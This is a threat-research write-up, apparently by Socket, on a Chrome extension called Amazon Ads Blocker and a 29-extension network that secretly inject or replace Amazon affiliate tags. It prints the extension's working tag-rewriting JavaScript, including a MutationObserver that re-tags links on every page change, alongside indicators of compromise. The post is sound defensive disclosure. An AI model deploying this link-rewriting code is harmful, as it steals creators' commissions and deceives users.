Malicious Chrome Extension Performs Hidden Affiliate Hijacking

Socket's Threat Research Team identified a malicious Chrome extension Amazon Ads Blocker that markets itself as a tool to hide sponsored content on Amazon. The extension does block ads as advertised, but its primary function is hidden: it automatically injects the developer's affiliate tag (10xprofit-20) into every Amazon product link and replaces existing affiliate codes from content creators.

While the Chrome Web Store listing includes an affiliate disclosure, the disclosure describes a fundamentally different product than what the code implements, and the extension violates core Chrome Web Store policies implemented in June 2025 following the PayPal Honey incident, where the coupon-finding extension was found to replace creator affiliate cookies with its own at checkout, regardless of whether it provided any discount to users. The Amazon Ads Blocker extension remains available in the Chrome Web Store at the time of writing.

Update (January 29, 2026): Amazon Ads Blocker is part of a 29-extension network that targets multiple e-commerce platforms including Amazon, AliExpress, Best Buy, Shopify, and Shein. We updated the IOC’s and research post to reflect this campaign.

Advertised Functionality#

The Chrome Web Store listing describes Amazon Ads Blocker as a tool to "Browse Amazon without 'Sponsored' ads" that "enhances your shopping experience by hiding sponsored product blocks." The extension requests permissions for storage and access to 23 Amazon domains worldwide. The manifest declares a single purpose: ad blocking via CSS manipulation of sponsored content markers.

The extension does provide the advertised ad-blocking functionality. It identifies sponsored products by detecting Amazon's AdHolder and s-sponsored-list-item classes, marks them with a custom ab-sponsored class, and hides them using CSS. Users can toggle this feature on and off through the extension popup.

The Hidden Mechanism#

The affiliate hijacking code lives in content.js. After the extension initializes its ad-blocking logic, it calls initAffiliateLinker(), which rewrites every Amazon product link on the page: The code snippet shows the actual functionality, with our inline comments added.

const AFFILIATE_TAG = "10xprofit-20";

function initAffiliateLinker() {
    const links = document.querySelectorAll('a[href*="/dp/"], a[href*="/gp/product/"]');

    links.forEach(link => {
        try {
            const url = new URL(link.href);
            if (url.hostname.includes('amazon')) {
                const params = url.searchParams;
                if (params.has('tag')) {
                    const currentTag = params.get('tag');
                    if (currentTag !== AFFILIATE_TAG) {
                        params.set('tag', AFFILIATE_TAG);  // Replaces existing tags
                    }
                } else {
                    params.append('tag', AFFILIATE_TAG);
                }
                link.href = url.toString();
            }
        } catch (e) {
            // invalid url, ignore
        }
    });
}

The code targets all links containing /dp/ or /gp/product/ (Amazon's product URL patterns). If a link already has an affiliate tag, the extension replaces it with 10xprofit-20. If no tag exists, it appends the attacker's tag. This happens automatically on page load without any user interaction.

A MutationObserver monitors the DOM for changes and re-injects affiliate tags whenever new content loads:

function startAdObserver() {
    markAds();

    const observer = new MutationObserver((mutations) => {
        let shouldUpdate = false;
        for (const mutation of mutations) {
            if (mutation.addedNodes.length) {
                shouldUpdate = true;
                break;
            }
        }
        if (shouldUpdate) {
            markAds();
            initAffiliateLinker();  // Re-tags all links on DOM changes
        }
    });

    observer.observe(document.body, { childList: true, subtree: true });
}

This ensures the extension maintains control over affiliate tags even when Amazon loads new products via infinite scroll or AJAX requests. The user cannot disable this behavior. The extension's popup UI controls only ad blocking, with no mention of affiliate injection.

The Misleading Disclosure#

The Chrome Web Store listing includes an affiliate disclosure at the bottom of the overview section:

"AFFILIATE DISCLOSURE: This extension uses affiliate links. When you reveal a coupon code or deal and make a purchase through our links, we may earn a small commission at no additional cost to you. This helps us keep the extension free and constantly updated with new working codes."

This disclosure is not only misleading, but also violates Chrome’s web store policies. Google updated its Affiliate Ads Policy in June 2025, requiring that extensions using affiliate links must:

• Provide direct, transparent user benefit (discounts, cashback, donations)
• Require user action before each injection
• Never replace existing affiliate codes
• Disclose accurately how the program works

Amazon Ads Blocker violates the core requirements even with disclosure present:

1. No User Benefit

The extension provides no discount, cashback, or donation. Ad blocking is unrelated to affiliate injection. The disclosure justifies the program as keeping the extension "free and updated," but Chrome's policy requires tangible benefits to users, not funding for developers.

2. No User Action

Tags are injected automatically via MutationObserver without any user interaction. The disclosure's phrase "when you reveal a coupon code or deal" is factually incorrect—no reveal action exists in the code. Users simply browse Amazon while the extension operates in the background.

3. Tag Replacement

The code explicitly checks for existing tags and replaces them:

if (params.has('tag')) {
    const currentTag = params.get('tag');
    if (currentTag !== AFFILIATE_TAG) {
        params.set('tag', AFFILIATE_TAG);
    }
}

The disclosure never mentions this behavior, stating only that purchases "through our links" may earn commission.

4. Misleading Disclosure

The disclosure describes a coupon/deal extension with user-triggered reveals. The actual product is an ad blocker with automatic link modification. This mismatch between disclosure and implementation creates false consent.

The extension also violates the Single Purpose policy by combining two unrelated functions (ad blocking and affiliate injection) that should be separate extensions.

Impact#

Content creators who share Amazon product links with their own affiliate tags lose commissions when users with this extension installed click those links. A YouTuber recommending a product with tag creator-20 will see their tag replaced with 10xprofit-20 before the user completes the purchase. The creator earns nothing while the extension developer receives the full commission.

Amazon Associates typically pays 1-10% commission depending on product category. The extension developer accumulates these commissions passively across all users' purchases. Users receive no benefit from this monetization beyond the stated ad-blocking functionality, which operates independently of the affiliate system.

The extension also sets an uninstall URL pointing to https://10xprofit[.]io/tools/?utm_source=chrome-extension, which opens in the browser when users remove the extension. This is used for tracking uninstall rates and potentially re-engaging users.

Coordinated Spam Operation#

Amazon Ads Blocker is one of 29 extensions operated under the 10xprofit brand. The network targets multiple e-commerce platforms including Amazon, AliExpress, Best Buy, Shopify, and Shein. All extensions share the same backend infrastructure (10xprofit.io) and exhibit similar patterns:

• Legitimate utility features (ad blocking, price tracking, product research tools)
• Hidden affiliate injection in the background
• Shared code infrastructure and obfuscation techniques
• Post-June 2025 policy enforcement updates

Analysis of the extension network reveals two primary categories:

Affiliate Injection Extensions: Modify product links across e-commerce platforms to insert affiliate codes. Amazon-focused extensions use tag 10xprofit-20, while AliExpress extensions use affiliate key _c3pFXV63 with deep link redirects. Some replace existing affiliate tags (like Amazon Ads Blocker), while others only inject when no tag exists. All operate without user action or clear disclosure.

Data Collection Extensions: Scrape comprehensive product data including prices, seller information, and inventory levels, then transmit to app[.]10xprofit[.]io/api/v1 endpoints. Users are not informed their browsing activity is being monitored and sent to external servers.

Deceptive UI Extensions: Some extensions include additional dark patterns beyond affiliate injection. The AliExpress extension creates fake "LIMITED TIME DEAL" countdown timers on product pages to manipulate users into rushed purchase decisions. When no legitimate timer exists, the extension generates fake countdowns (2-15 hours) based on product IDs, creating false urgency to increase conversion rates on affiliate links.

The coordinated nature of the operation, shared developer account, consistent backend infrastructure, and systematic policy violations across multiple platforms and extensions, indicates deliberate strategy rather than isolated oversights. The developer continues to update and publish new extensions after Chrome's June 2025 policy enforcement date.

Socket has identified 28 additional extensions in this network operating across Amazon, AliExpress, Best Buy, Shopify, and Shein.

Outlook and Recommendations#

This extension demonstrates how disclosure alone doesn't ensure compliance when the disclosed behavior differs from the implemented behavior. The Chrome Web Store listing describes a coupon extension with user-triggered actions, while the code implements an ad blocker with automatic background injection. This pattern allows extensions to pass initial review while violating policy intent.

The extension follows the same commission hijacking pattern as PayPal Honey, which prompted Google's 2025 policy update. Amazon Ads Blocker was updated in January 2026, after the June 2025 policy enforcement date, suggesting either unfamiliarity with the new requirements or deliberate avoidance through misleading disclosure.

Similar patterns are likely to appear in other shopping and deal extensions. Extensions that combine unrelated functionality (ad blocking, price comparison, coupon finding) with affiliate injection should be treated as high-risk, particularly those with disclosures that don't match the actual code behavior.

The legitimate use case for affiliate links in extensions exists: extensions can provide cashback, aggregate coupons, or donate commissions to charity. These require accurate disclosure matching the implementation, user opt-in for each injection, and must never replace existing affiliate codes. Amazon Ads Blocker implements none of these requirements despite having disclosure present.

For Users

• Uninstall this extension immediately
• Check installed extensions for affiliate disclosures that don't match functionality
• Compare extension descriptions against disclosed monetization methods
• Use established ad blockers from verified developers
• Report extensions with misleading disclosures using the "Report abuse" button

For Security Teams

• Report to Chrome Web Store security team with evidence of disclosure mismatch
• Flag affiliate tag 10xprofit-20 with Amazon Associates for investigation
• Monitor for extensions where disclosure describes different product than code implements
• Check extension update patterns against policy enforcement dates
• Look for automatic injection patterns paired with coupon/deal disclosure language

Socket's Chrome extension protection analyzes extension bundles for hidden affiliate injection, compares disclosed behavior against actual code implementation, and blocks policy violations before they reach user endpoints.

MITRE ATT&CK#

• T1176.001 — Browser Extensions
• T1059.007 — JavaScript Execution
• T1657 — Financial Theft

Indicators of Compromise#

Chrome Extensions

1. Name: Amazon Ads Blocker
   • Extension ID: pnpchphmplpdimbllknjoiopmfphellj
2. Name: 10xprofit Amazon Seller Tools
   • Extension ID: ahlnchhkedmjbdocaamkbmhppnligmoh
3. Name: Amazon ASIN Lookup 10xprofit
   • Extension ID: ljcgnobemekghgobhlplpehijemdgcgo
4. Name: Amazon Search Suggestion
   • Extension ID: dnmfcojgjchpjcmjgpgonmhccibjopnb
5. Name: Amazon Product Scraper 10xprofit
   • Extension ID: mnacfoefejolpobogooghoclppjcgfcm
6. Name: Amazon Quick Brand Search
   • Extension ID: nigamacoibifjohkmepefofohfedblgg
7. Name: Amazon Stock Checker 999
   • Extension ID: johobikccpnmifjjpephegmfpipfbfme
8. Name: Amazon Price History Saver
   • Extension ID: kppfbknppimnoociaomjcdgkebdmenkh
9. Name: Amazon ASIN Copy
   • Extension ID: aohfjaadlbiifnnajpobdhokecjokhab
10. Name: Amazon Keyword Cloud Generator
    • Extension ID: gfdbbmngalhmegpkejhidhgdpmehlmnd
11. Name: Amazon Image Downloader
    • Extension ID: cpcojeeblggnjjgnpiicndnahfhjdobd
12. Name: Amazon Negative Review Hider
    • Extension ID: hkkkipfcdagiocekjdhobgmlkhejjfoj
13. Name: Amazon Listing Score Checker
    • Extension ID: jaojpdijbaolkhkifpgbjnhfbmckoojh
14. Name: Amazon Keyword Density Searcher
    • Extension ID: ekomkpgkmieaaekmaldmaljljahehkoi
15. Name: Amazon Sticky Notes
    • Extension ID: hkhmodcdjhcidbcncgmnknjppphcpgmh
16. Name: Amazon Result Numbering
    • Extension ID: nipfdfkjnidadibpbflijepbllfkokac
17. Name: Amazon Profit Calculator
    • Extension ID: behckapcoohededfbgjgkgefgkpodeho
18. Name: Amazon Weight Converter
    • Extension ID: dfnannaibdndmkienngjahldiofjbkmj
19. Name: Amazon BSR Fast View
    • Extension ID: nhilffccdbcjcnoopblecppbhalagpaf
20. Name: AliExpress Invoice Generator
    • Extension ID: mabbblhhnmlckjbfppkopnccllieeocp
21. Name: Amazon Global Price Checker
    • Extension ID: mjcgfimemamogfmekphcfdehfkkbmldn
22. Name: Walmart Search By Image
    • Extension ID: mcaihdkeijgfhnlfcdehniplmaapadgb
23. Name: SHEIN Search By Image
    • Extension ID: mpgaodghdhmeljgogbeagpbhgdbfofgb
24. Name: Shopify Search By Image
    • Extension ID: gjlbbcimkbncedhofeknicfkhgaocohl
25. Name: BestBuy Search By Image
    • Extension ID: nppjmiadmakeigiagilkfffplihgjlec
26. Name: AliExpress Price Tracker - Price History & Alerts
    • Extension ID: loiofaagnefbonjdjklhacdhfkolcfgi
27. Name: AliExpress Quick Currency & Price Converter
    • Extension ID: mcaglpclodnaiimhicpjemhcinjfnjce
28. Name: Amazon Character Count & Seller Tools
    • Extension ID: goikoilmhcgfidolicnbgggdpckdcoam
29. Name: AliExpress Deals Countdown - Flash Sale Timer
    • Extension ID: jmlgkeaofknfmnbpmlmadnfnfajdlehn

Threat Actor

• Chrome Handle: 10Xprofit , ecomstal.official
• Registered Email: 10xprofitio@gmail[.]com, ecomstal.official@gmail[.]com